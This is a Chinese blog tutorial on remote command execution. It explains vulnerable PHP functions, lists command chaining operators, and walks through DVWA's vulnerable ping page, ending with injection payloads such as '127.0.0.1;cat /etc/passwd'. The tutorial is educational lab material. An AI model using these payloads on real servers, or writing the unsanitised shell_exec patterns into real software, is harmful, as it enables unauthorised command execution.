RCE: 远程命令执行

于 2024-07-23 15:13:04 发布
阅读量550 收藏 5
点赞数 13
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1008685/article/details/140635210
版权

RCE漏洞的定义

应用程序允许攻击者在远程服务器上执行未授权的代码或命令。

RCE漏洞的原理

漏洞原理:

  • 代码执行漏洞:应用程序中的某些函数可以执行用户输入的代码。例如,PHP中的eval()函数可以将字符串作为代码执行。
  • 命令执行漏洞:应用程序中的某些函数可以执行系统命令,并将用户输入作为命令参数。攻击者通过拼接符,执行其他命令

常见命令执行函数及命令拼接符

函数

函数描述示例代码
eval()执行字符串作为PHP代码eval($_GET['code']); 这会执行通过GET请求传递的代码。
exec()执行一个命令行命令exec($_GET['cmd']); 这会执行通过GET请求传递的命令。
shell_exec()执行命令,并将完整的输出作为字符串返回$output = shell_exec($_GET['cmd']); 这会执行命令并获取输出。
system()执行命令并显示输出system($_GET['cmd']); 这会执行命令并输出结果。

命令拼接符

拼接符Windows 示例Linux 示例
&&command1 && command2 命令1执行成功才执行命令2command1 && command2 命令1执行成功才执行命令2
&command1 & command2 命令1在后台运行,然后执行命令2command1 & command2 命令1在后台运行,然后执行命令2
;command1 ; command2 无论命令1成功与否都执行命令2command1 ; command2 无论命令1成功与否都执行命令2

实例【dvwa靶场】

具ping功能存在rce漏洞的网站

源码解析

<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
    
        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    } else { 
    
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    }
    
}
?>

运行逻辑

1.检查用户请求中是否存在 submit 参数,存在执行if语句

<?php

if( isset( $_POST[ 'submit' ] ) ) {

2.获取请求中,参数名为 ip 的值,并赋值给变量target

    $target = $_REQUEST[ 'ip' ];

3 使用 php_uname() 函数,获取服务器系统信息,使用 stristr() 函数 忽视大小写查询字符串中,是否存在指定内容

 if (stristr(php_uname('s'), 'Windows NT')) { 

<1..如果服务器系统为windows,使用 shell_exec() 执行windows样式的ping命令 

        $cmd = shell_exec( 'ping  ' . $target );

<2.使用 <pre> 标签格式化显示命令输出结果

        echo '<pre>'.$cmd.'</pre>';

4.如果服务器不是windows系统执行else语句

    } else { 

<1.拼接linux系统命令,使ping命令限制回应次数为三次

        $cmd = shell_exec( 'ping  -c 3 ' . $target );

<2.输出结果

        echo '<pre>'.$cmd.'</pre>';

漏洞利用

使用命令拼接符进行拼接

1.执行命令

payload:127.0.0.1;ls

 2.查看系统文件

payload:127.0.0.1;cat /etc/passwd

Zeddm
关注
  • 13
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sapConfigServlet_rce:检查 SAP ConfigServlet 未经身份验证的远程代码执行漏洞
06-28
sapConfigServlet_rce 一个简单的python脚本,用于检查SAP ConfigServlet远程未经身份验证的远程代码执行漏洞
RCE(远程命令执行)
qq_63963927的博客
10-15 230
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
RCE漏洞(远程命令执行
NSQ0207的博客
07-27 547
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行代码执行
weixin_52796034的博客
10-26 3200
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行执行攻击者指定的代码RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞!
RCE(远程命令/代码执行)
Massimo__JAVA的博客
08-04 481
系统对用户输入的参数过滤不严,导致用户可以输入&、|、||等命令连接符,拼接并执行命令
RCE远程命令/代码执行
weixin_55666442的博客
04-15 317
pikachu中RCE漏洞的简要笔记
weblogic_rce:cve2019_2725,CNVD-C-2019-48814 Weblogic _async远程命令执行exp
03-15
CNVD-C-2019-48814,CVE-2019-2725 Weblogic _async远程命令执行exp 主要代码基于js实现。 Linux Payload使用Jason,Windows Payload修改为10271,执行java.lang.Runtime。 环境需求 Windows的所有版本。 用法 cve...
用友NC BeanShell远程代码执行
09-07
用友 NC bsh.[servlet](https://so.csdn.net/so/search?q=servlet&spm=1001.2101.3001.7020).BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。 ## 漏洞影响 ``` NC 6.5版本 具体详见...
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ...
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行RCE)POC
06-06
远程命令执行RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地...
RCE远程命令执行)漏洞详解
sev1n的博客
04-02 2901
RCE(remote command/code execute,远程命令执行)漏洞 远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码执行攻击者控制的代码的能力可用于各种目的,包括部署额外的恶意软件或窃取敏感数据。
RCE(remote command/code execute)-远程命令执行
田田云逸的博客
04-28 251
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
RCE(远程命令执行)绕过总结
Elite的博客
04-18 3878
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
黑客=高材生?99%的黑客都没学过计算机
m0_71746416的博客
04-21 1328
黑客都是高学历吗?
RCE代码命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 4572
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
RCE远程代码执行
最新发布
q
06-18 815
RCE代码执行:引用脚本代码解析执行RCE命令执行:脚本调用操作系统命令
JavaScript学习笔记(二十)DOM动画效果
2401_84254011的博客
04-28 531
/0 ~ 100}else{//100// 3. 速度取整;}else{}else{// 4. 终止条件;} , 50)
远程代码/命令执行(RCE)
hakksjss的博客
05-07 826
call_user_function_array(),参数一为回调函数、参数二为调用函数传递数组 $a=$_GET['a'];eval()、assert()、create_function()、call_user_function()、 call_user_function_array()、array_map、$a($b)动态函数(使用7.2以下测试)、正则 preg_grep。system()、exec()、shell_exec()、``等价于shell_exec()、popen、passthru。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值